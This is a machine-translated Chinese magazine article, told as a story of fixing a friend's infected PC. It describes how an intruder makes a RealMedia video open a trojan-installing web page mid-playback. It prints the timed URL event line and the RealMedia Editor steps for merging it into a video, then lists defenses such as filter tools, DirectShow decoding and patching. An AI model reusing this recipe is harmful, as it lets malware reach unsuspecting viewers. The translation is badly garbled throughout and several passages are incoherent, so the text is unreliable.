RM file, the Trojan how to do

RM file, the Trojan how to do?

51 during the overcrowded everywhere, I still chooses to stay home to spend not less than seven days is not long holiday, in fact, and I have a lot of people have the same arrangement, such as Jia Jia MM is the case. In order to alleviate the pressure of work some time ago, and she intends to stay quietly at home which did not go, prepare for and survive with a variety of large, are so-called "517 days music, at home happy."
51 just two days, on the third day woke up early in the morning, I suddenly received a MM Jia Jia calls for help. "East-yu brother, I would like to give you something to discuss at noon today I ask you to eat right? "This sentence makes lying in bed, I thought I was dreaming, and even pinch a few of their own. "Is Hong Menyan! Need to know before I invite her to dinner, have refused to compliment to the place, today actually invited me to dinner, there must be some demand for me. "Right on cue, at dinner time, Jia Jia, MM said he might have fallen into the system, Trojan horses and let him help us to see.
eating mouth is short, there is no way home after dinner I went to MM. Having carefully reviewed the process of the system and found a suspicious "iexplore.exe" process. "This is not IE browser, do the process, I do not run ah, how does such a process? "My heart has thrown doubt," It seems that your system must be in some kind of Trojan horses, IE browser, it is called. "
" In addition to these days, I downloaded three movies, nothing to download ah! "MM says. So I have three films, it was discovered Unexpectedly, which has some strange link. Trojan appears to be in a web page, this simple, find the page, then solve the problem, clear out the system in the Trojan horse.
"to see several of his films will be in the Trojan horse? "Jia Jia MM asked, puzzled. "You do not say that only RealPlayer player, users will do in the Trojan horse? I use MPC, but ah, how has the Trojans out? "I had to explain:" In the past, only RealPlayer player, can be in the web page Trojans, but now the invasion of ways with each passing day is simply impossible to defend ah. Today, just empty, so you can show off, to see how the intruder RM file to add malicious code. , "done all that as soon as hands-on demonstration to the MM.
reproduce RM Trojan Hoax
"As the RM file is the most commonly used on the network, one of the multimedia file types, so this way the spread of Trojan Web page that allows users face even more endangered Wide . In fact, this method was first used in communication networks advertising, but now has been an intruder used, and to the general RM files to your page links to Trojan operations are not complicated, with some ready-made tools can be completed, such as Helix Producer Plus, RealMedia Editor. "I give an introduction to the MM.
"First of all to prepare a RM video file as a Trojan the spread of pages of raw materials, the best there are some attractive elements, or the victim would not have to watch the Trojan is triggered that time period. There is also an advantage is that, when a user relish the time to watch movies is not going to care about the pop-up pages. "I have to add a bit.
I first open the Notepad program, create a text file, enter the following in the above section of code, and then save it as mm.txt:
u 00:00:20.0 00:00:30.0 & & ; _rpexternal & & http://www.cpcw.com/test.htm
me explain the meaning of this code. Where u is the event flags (Flag), said to be inserted in the document is a URL address. Then the third field represents the starting and ending point in time, the unit format is "hours: minutes: seconds. Ms\Open the URL, rather than using the default browser to open Realplayer embedded URL. Here that when the players to the first 20 seconds or to drag the playback progress of the first 20-30 seconds, when at any time between, RM files will automatically call the system default browser to open "http://www.cpcw.com/ test.htm "link to this page, which will install Trojan programs to the user's system.
Then I run the RM video files, editing tools RealMedia Editor, click on "File" menu under "Open the Real Media file" command to open a previously prepared that part of the normal RM video files, and then click the & ldquo ; Tools "menu under the" merger event "command, select the text file that you just saved. Finally, click "File" menu under the "RealMedia File Save As" command, it would be saved as a new RM file, so that a Trojan horse to bring the web page document produced by RM.

for MM Weapon
For this malicious RM files to prevent, different situations can be used in different ways. For those who can download to your hard drive in the RM file, we can be called a "Real media filter" software on the suspicious RM file handling, which may contain some of the web links and special effects plus removal of out. Run "Real media filter" in the "source document" and "Save As" option to the appropriate settings, and then click "Start Filtering" button you can remove the suspicious RM file redundant links (Figure 2). Filtration is complete, the program will pop up a dialog box and prompts filter content.
In addition, if the user using MPC to play, you can decode the Real media file type is set to DirectShow can be, since the use of DirectShow format can be automatically screened out these ads. But since RM file is the company's exclusive Real format, so DirectShow format for some special RM files can not be decoded. Then only use the RealMedia format player, but the ads feature will automatically shield failure.
finally reminded lovely MM, in time to the Microsoft website to download the latest security patches to plug the loopholes in the system and software; install the latest anti-virus software and update virus database; install the network firewall, blocking does not require port, and the process of trying to connect to the Internet to conduct careful screening.